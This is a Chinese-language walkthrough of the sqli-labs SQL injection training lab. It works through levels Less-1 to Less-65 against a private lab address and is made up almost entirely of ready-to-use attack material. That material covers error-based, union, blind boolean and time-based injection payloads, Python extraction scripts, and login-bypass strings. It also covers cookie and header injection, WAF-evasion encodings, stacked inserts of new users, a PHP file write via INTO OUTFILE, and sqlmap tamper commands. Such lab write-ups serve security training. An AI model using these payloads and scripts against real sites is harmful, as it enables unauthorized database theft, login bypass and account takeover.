# 重要知识点

# 10 种常见报错函数

'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 

 'and extractvalue(1,concat(0x7e,(select(database()))))-- 

 'or EXP(~(SELECT(*)from(select(database())a))#

 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from information_schema.tables group by x) a)#

 'and GeometryCollection((select * from (select * from(select database())a)b))#

 'and polygon((select * from(select * from(select database())a)b))#

 'and multipoint((select * from(select * from(select database())a)b))#

 'and multilinestring((select * from(select * from(select database())a)b))#

 'and LINESTRING((select * from(select * from(select database())a)b))#

 'and multipolygon((select * from(select * from(select database())a)b))#

# 时间盲注脚本

import requests

from datetime import datetime

import time

strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'

url = 'http://192.168.183.129:8082/Less-9/?id='

table_name = ''

print('[+] 开始盲注')

for n in range(1,10):

	for i in strs:

		s = datetime.now()

		payload = "1' and if(ascii(substr(database(),{},1))={},sleep(1.5),1)--+".format(str(n),str(ord(i)))

		#data = {'password':'123',

		#		'username':payload

		#		}

			#requests.post(url,data=data)

		requests.get(url + payload)

		#print(url + payload)

		e = datetime.now()

		if (e-s).seconds >= 1:

			table_name = table_name + str(i)

			print('[*] 成功盲注第{}位，字符为{}'.format(str(n),str(i)))

			break

	time.sleep(0.5)

print('[+] 盲注结束,结果为{}'.format(table_name))

# 布尔盲注脚本

import requests

url = 'http://192.168.183.129:8082/Less-15/'

result = ''

for x in range(1, 50):

    high = 127

    low = 32

    mid = (low + high) // 2

    while high > low:

        #payload = "1')or if(ascii(substr((select(password)from(users)),%d,1))>%d,1,0)#" % (x, mid)

        payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

        data = {

            "uname": payload,

            "passwd":"123",

            "submit":"Submit",

        }

        response = requests.post(url, data = data)

        #print(payload)

        if 'flag' in response.text:

            low = mid + 1

        else:

            high = mid

        mid = (low + high) // 2

    result += chr(int(mid))

    print(result)

# 常用 sql 查询语句

查库

select(database())

查表

select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())

查字段

select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')

查数据

select(group_concat(password))from(users)where(username='secure')

查看数据库

show databases;

查看该数据库的数据表

show tables;

查看该数据表的结构

desc xxx;

查找某个数据表的所有内容

select * from xxx;

# 解题过程

# Less-1

注释符 用 --+

爆出数据库名

?id=11111111 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

其他报错exp

?id=11111111 'and extractvalue(1,concat(0x7e,(select(database()))))--+

爆出表名

?id=11111111 'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+

爆出字段名

11111111 'and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+

查询 secure 的密码

?id=11111111 'and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-2

跟 less-1 一样的步骤，不需要引号来闭合，略微有点不同。

?id=11111111 and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

?id=11111111 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+

11111111 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+

?id=11111111 and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-3

跟 less-1 差不多。猜测后端语句为

select username,password from users where id = ('$id')

同样的操作

?id=11111111') and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+

?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+

?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-4

双引号 + 括号，闭合语句。--+ 为注释。只验证存在注入就足够了，因为后续的操作都是一样的。

?id=11111111") and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

# Less-5

单引号闭合语句。只验证存在注入就足够了，因为后续的操作都是一样的。

?id=99999999992'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

# Less-6

双引号闭合语句，报错注入

?id=1"and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

# Less-7

写出文件，条件 secure_file_priv 不为 NULL，目录是可写的

111')) union select 1,"<?php phpinfo();?>",2 into outfile "/var/www/html/test/3.txt"--+

虽然提示语法报错，但文件已经写出来了。

# Less-8

布尔盲注 ，时间盲注都可以

布尔盲注脚本如下

import requests

url = 'http://192.168.183.129:8082/Less-8/?id='

result = ''

for x in range(1, 50):

    high = 127

    low = 32

    mid = (low + high) // 2

    while high > low:

        payload = "1' and ascii(substr((select group_concat(username) from users),%d,1))>%d--+" % (x, mid)

        data = {

            "id":payload

        }

        response = requests.get(url+ payload)

        #print(response.text)

        if 'You are in' in response.text:

            low = mid + 1

        else:

            high = mid

        mid = (low + high) // 2

    result += chr(int(mid))

    print(result)

时间盲注脚本如下

import requests

from datetime import datetime

import time

strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'

url = 'http://192.168.183.129:8082/Less-8/?id='

table_name = ''

print('[+] 开始盲注')

for n in range(1,10):

	for i in strs:

		s = datetime.now()

		payload = "1' or if(ascii(substr(database(),{},1))={},sleep(0.3),1)--+".format(str(n),str(ord(i)))

		#data = {'password':'123',

		#		'username':payload

		#		}

			#requests.post(url,data=data)

		requests.get(url + payload)

		e = datetime.now()

		if (e-s).seconds >= 2:

			table_name = table_name + str(i)

			print('[*] 成功盲注第{}位，字符为{}'.format(str(n),str(i)))

			break

	time.sleep(0.5)

print('[+] 盲注结束,结果为{}'.format(table_name))

# Less-9

?id=1' and if (1=1,sleep (1),1)--+ 测试会有延时。

时间盲注脚本

import requests

from datetime import datetime

import time

strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'

url = 'http://192.168.183.129:8082/Less-9/?id='

table_name = ''

print('[+] 开始盲注')

for n in range(1,10):

	for i in strs:

		s = datetime.now()

		payload = "1' and if(ascii(substr(database(),{},1))={},sleep(1.5),1)--+".format(str(n),str(ord(i)))

		#data = {'password':'123',

		#		'username':payload

		#		}

			#requests.post(url,data=data)

		requests.get(url + payload)

		#print(url + payload)

		e = datetime.now()

		if (e-s).seconds >= 1:

			table_name = table_name + str(i)

			print('[*] 成功盲注第{}位，字符为{}'.format(str(n),str(i)))

			break

	time.sleep(0.5)

print('[+] 盲注结束,结果为{}'.format(table_name))

# Less-10

脚本基本一样，lee-9 脚本语句里的单引号改成双引号，即可。

import requests

from datetime import datetime

import time

strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'

url = 'http://192.168.183.129:8082/Less-10/?id='

table_name = ''

print('[+] 开始盲注')

for n in range(1,10):

	for i in strs:

		s = datetime.now()

		payload = '1" and if(ascii(substr(database(),{},1))={},sleep(1.5),1)--+'.format(str(n),str(ord(i)))

		#data = {'password':'123',

		#		'username':payload

		#		}

			#requests.post(url,data=data)

		requests.get(url + payload)

		#print(url + payload)

		e = datetime.now()

		if (e-s).seconds >= 1:

			table_name = table_name + str(i)

			print('[*] 成功盲注第{}位，字符为{}'.format(str(n),str(i)))

			break

	time.sleep(0.5)

print('[+] 盲注结束,结果为{}'.format(table_name))

# Less-11

在账号框 输入 123‘会报错，并看见 sql 查询语句。

构造万能密码，即可绕过登录。

admin'or 1=1-- 

密码随便输入

联合注入

222'union select database(),3#

# Less-12

构造万能密码，即可绕过登录。

11")or 1=1-- 

123

联合注入

222")union select database(),3#

# Less-13

构造万能密码，即可绕过登录。

admin')or 1=1-- 
123

布尔盲注，爆数据

import requests

url = 'http://192.168.183.129:8082/Less-13/'

result = ''

for x in range(1, 50):

    high = 127

    low = 32

    mid = (low + high) // 2

    while high > low:

        #payload = "1')or if(ascii(substr((select(password)from(users)),%d,1))>%d,1,0)#" % (x, mid)

        payload = "1')or if(ascii(substr((select(database())),%d,1))>%d,1,0)#" % (x, mid)

        data = {

            "uname": payload,

            "passwd":"123",

            "submit":"Submit",

        }

        response = requests.post(url, data = data)

        #print(payload)

        if 'flag' in response.text:

            low = mid + 1

        else:

            high = mid

        mid = (low + high) // 2

    result += chr(int(mid))

    print(result)

# Less-14

构造万能密码，即可绕过登录。

admin"or 1=1#
123

布尔盲注

payload = '''1"or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

# Less-15

绕过登录
admin'or 1=1-- 
123



布尔盲注
 payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

# Less-16

能万能密码登录的，都可以布尔盲注，不做代码例子了。

# Less-17

报错注入

 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 
其他方式
 'and extractvalue(1,concat(0x7e,(select(database()))))-- 
 'or EXP(~(SELECT * from(select database())a))#
 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from information_schema.tables group by x) a)#
 'and GeometryCollection((select * from (select * from(select database())a)b))#
 'and polygon((select * from(select * from(select database())a)b))#
 'and multipoint((select * from(select * from(select database())a)b))#
 'and multilinestring((select * from(select * from(select database())a)b))#
 'and LINESTRING((select * from(select * from(select database())a)b))#
 'and multipolygon((select * from(select * from(select database())a)b))#

# Less-18

账号密码输入 admin 123456

header 中 UA 注入

 User-Agent:ing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

# Less-19

header 中 referer 注入

账号密码输入 admin 123456

Referer : ing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

# Less-20

cookie 注入

正常登录后，会提示 cookie 的格式。

构造一下 cookie 即可注入

uname=admin'and extractvalue(1,concat(0x7e,(select(database()))))#

# Less-21

对 cookie 进行 base64 编码，就能注入了。

raw
uname=admin')and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)or ('
base64
uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUKGRhdGFiYXNlKCkpKSwweDdlKSwxKW9yICgn

# Less-22

对 cookie 进行 base64 编码，双引号闭合

raw 
uname=admin"and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)#
base64
uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QoZGF0YWJhc2UoKSkpLDB4N2UpLDEpIw==

# Less-23

题目有过滤 -- 和 # , 只能闭合引号来实现语句的正常运行。

?id=1123'union select 1,database(),3 or '

# Less-24

二次注入

我们的步骤是

1. 注册一个 admin'# 的账号，并登录

修改该帐号的密码，此时修改的就是 admin 的密码，我修改为 123456。

Sql 语句变为 UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='

也就是执行了 UPDATE users SET passwd="New_Pass" WHERE username =' admin'

成功的话跳转页面会提示 Password successfully updated

3. 用刚修改的密码我的是 123456，登陆 admin 管理员账号，就可以成功登陆。

# Less-25

过滤 or 可以双写绕过

联合注入
?id=100'union select 1,database(),3--+

万能密码
?id=100'oorr 1=1--+

# Less-26

绕过空格

（1）双空格
（2）/**/
（3）用括号绕过
（4）用回车代替 //ascii码为chr(13)&chr(10)，url编码为%0d  %0a
 (5)%20 %09 %0a %0b %0c %0d %a0 %00  

%09 TAB键（水平）

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键（垂直）

%a0 空格

?id=1111%27uNion%a0sElect(1),(database()),(4)%a0oorr%a0(1)=%271
?id=1111%27uNion%0BsElect(1),(database()),(4)%a0oorr%a0(1)=%271

sqlmap

python sqlmap.py -u http://192.168.183.129:8082/Less-26/?id=1 -proxy=http://127.0.0.1:8080 --tamper doublewords.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 --tech E --dbs

# Less-27

% a0 绕过空格 大小写绕过关键字 or‘1’=‘1 闭合后边

?id=999%27unioN%a0selecT%a01,database(),3%a0or%a0%271%27=%271

sqlmap

python sqlmap.py -u http://192.168.183.129:8082/Less-27/?id=1 -proxy=http://127.0.0.1:8080 --tamper randomcase.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 -tech E --dbs

# Less-27a

双引号闭合

?id=111%22uNion%a0sELect%a01,database(),%223

# Less-28

盲注 payload

?id=1')and(length(database())>7)and('1')=('1
?id=1')and(length(database())>8)and('1')=('1

# Less-28a

联合注入 payload

?id=1111%27)uNion%a0sElect(1),(database()),(4)%a0or%a0(%271%27)=(%271

盲注 payload

?id=1')and(length(database())>7)and('1')=('1
?id=1')and(length(database())>8)and('1')=('1

# Less-29,30,31

都是同一种类型，http 参数污染。

我们在输入数字的时候先给 waf 看然后检测正常后才转发给我们需要访问的页面，那篇文章是有写到的，这里我弄 2 个值，一个是用来欺骗 waf 的。另一个才是给我们需要访问页面的

看一下这篇博客，http://blog.csdn.net/nzjdsds/article/details/77758824

联合注入 payload

?id=1&id=-1' union select 1,2,database()--+

# Less-32

Bypass addslashes()

宽字节注入解析

payload

?id=111%df%27%20union%20select%201,2,database()--+

# Less-33

payload

?id=111%df%27%20union%20select%201,2,database()--+

# Less-34

改为 post 提交，跟 33 一样

uname=111%df%27%20union%20select%201,database()--+&passwd=1&submit=Submit

# Less-35

整数型注入，不出现引号，就绕过了。非要用引号时，拿 16 进制代替绕过

 union select 1,database(),2--+

# Less-36

同 33

?id=111%df%27%20union%20select%201,2,database()--+

# Less-37

同 34

uname=111%df%27%20union%20select%201,database()--+&passwd=1&submit=Submit

# Less-38

堆叠注入详细介绍

?id=1';insert into users(id,username,password)values(20,'zeroc','2021')--+
?id=20

# Less-39

同 38 去掉单引号

?id=1;insert into users(id,username,password)values(20,'zeroc','2021')--+
?id=21

# Less-40

‘）闭合

?id=1');insert into users(id,username,password)values(21,'zeroc','2021')--+
?id=22

# Less-41

?id=1;insert into users(id,username,password)values(22,'zeroc','2021')--+
?id=23

# Less-42

login_user=zeroc&login_password=1231';insert into users(id,username,password)values(29,'zerocd','2021');#&mysubmit=Login

之后登录zerocd  2021 就能进去了，说明存在堆叠注入

# Less-43

’）闭合

login_user=zeroc&login_password=1231');insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-44

’闭合，删除了报错信息

login_user=zeroc&login_password=1231';insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-45

’）闭合

login_user=zeroc&login_password=1231');insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-46

我们可以通过 asc 和 desc 查看返回数据是否相同来简单判断是否存在 order by 注入

?sort=1 desc
?sort=1 asc

根据返回内容，判断确实存在注入

order by 注入有很多种方式进行注入
比如：报错注入、盲注、异或注入。如果达到一定条件还可以联合注入
报错注入很简单：

?sort=1 and updatexml(1,concat(0x7e,(select database())),1)
?sort=1 procedure analyse(extractvalue(rand()*2,concat(0x3a,version())),1)  

延时：

?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

布尔

?sort=rand(ascii(left(database(),1))=115)

# Less-47

引号闭合一下，同 46

?sort=1' and updatexml(1,concat(0x7e,(select database())),1) --+

# Less-48

报错注入无法使用了，可以其他方式。

延时：

?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

布尔

?sort=rand(ascii(left(database(),1))=115)

# Less-49

延时

?sort=1' and (If(ascii(substr(database(),1,1))=115,sleep(5),1))--+

# Less-50

堆叠注入

?sort=1;create table test like users--+

# Less-51

报错注入

?sort=1' and updatexml(1,concat(0x7e,(select database())),1) --+

# Less-52

1;create table test52 like users;%23

# Less-53

1';create table test53 like users;%23

# Less-54

查库

?id=-1%27%20union%20select%201,database(),%27

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='5LODAMXH0G

查数据

?id=-1' union select 1,group_concat(secret_AM6G),3 from 5LODAMXH0G%23

# Less-55

跟 54 一样，单引号改成括号闭合

查库

?id=-1) union select 1,database(),3%23

# Less-56

跟 54 一样，单引号改成单引号 + 括号闭合

查库

?id=-1') union select 1,database(),3%23

# Less-57

跟 54 一样，单引号改成双引号闭合

查库

?id=-1" union select 1,database(),3%23

# Less-58

报错注入

?id=0' and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-59

报错注入同 58，变为数字型注入

?id=0 and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-60

报错注入同 58，单引号闭合 变成 双引号 + 括号闭合

?id=0") and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-61

报错注入同 58，单引号闭合 变成 单引号 + 括号 + 括号闭合

?id=0')) and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-62

payload

?id=1') and ascii(substr((select database()),%d,1))>%d--+

布尔盲注

import requests

url = 'http://192.168.183.129:8082/Less-62/'

result = ''

for x in range(13, 20):

    high = 127

    low = 32

    mid = (low + high) // 2

    while high > low:

        #payload = "1')or if(ascii(substr((select(password)from(users)),%d,1))>%d,1,0)#" % (x, mid)

        payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

        payload = "?id=1') and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)

        #payload = "?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d--+" % (x, mid)

        #payload = "?id=1') and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='E8B6UU2V7P'),%d,1))>%d--+" % (x, mid)

        #payload = "?id=1') and ascii(substr((select `secret_DD7F` from `2JYDAB1TK2`),%d,1))>%d--+" % (x, mid)

        data = {

            "uname": payload,

            "passwd":"123",

            "submit":"Submit",

        }

        #response = requests.post(url, data = data)

        response = requests.get(url+ payload)

        #print(payload)

        if 'Angelina' in response.text:

            low = mid + 1

        else:

            high = mid

        mid = (low + high) // 2

    result += chr(int(mid))

    print(result)

# Less-63

同 62，闭合方式不一样。payload

?id=1' and ascii(substr((select database()),%d,1))>%d--+

# Less-64

同 62，闭合方式不一样。payload

?id=1)) and ascii(substr((select database()),%d,1))>%d --+

# Less-65

同 62，闭合方式不一样。payload

?id=1" and ascii(substr((select database()),%d,1))>%d and "1"="1